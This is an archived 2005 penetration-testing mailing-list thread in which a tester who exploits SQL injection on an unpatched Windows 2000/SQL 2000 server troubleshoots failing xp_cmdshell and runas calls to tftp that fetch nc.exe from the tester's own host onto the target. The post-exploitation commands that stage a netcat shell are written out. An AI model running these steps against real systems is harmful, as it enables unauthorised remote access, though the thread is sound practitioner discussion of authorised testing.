Re: TFTP and XP_CMDSHELL - Weird

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Thu Jun 23 2005 - 09:38:06 EDT


>From: Jose Selvi <jselvi@s2grupo.com>
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 09:16:41 +0200
>
>Maybe sqlsvc user can't write in c:\ folder. Can he?
>
>In the first call to tftp you are using the Administrator user, who of course can
>write in c:\ .
>
>Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
>It must work.
>
It doesn't.
Besides, I have done "runas /user:sqlsvc echo a > c:\xx.exe" and the file is
created.
Any ideas?

If it is of any use, I receive the following error on the Target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')

In a tcpdump in my TFTP Server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede
abrir el archivo para escritura"
(cannot open file for writing)

I think it's beyond xp_cmdshell now.

Thanks, Andy

>Andres Molinetti wrote:
>>Hi, I am testing a Web App vulnerable to SQL Injection.
>>It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
>>
>>While trying to use the xp_cmdshell to upload nc.exe from my tftpd server
>>to the Webserver, I experienced some problems.
>>
>>I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
>>
>>As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET
>>nc.exe c:\nc.exe". File is downloaded.
>>
>>When I tried it through the web app it failed. I tried directly through
>>SQL Query Analyzer and it also failed.
>>
>>SQL is running as a low-privileged account (sqlsvc)...
>>
>>Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
>>nc.exe c:\nc.exe" and IT FAILED.!!
>>
>>I can easily deduce that the problem is the TFTP client (tftp.exe)...
>>
>>Any Ideas?
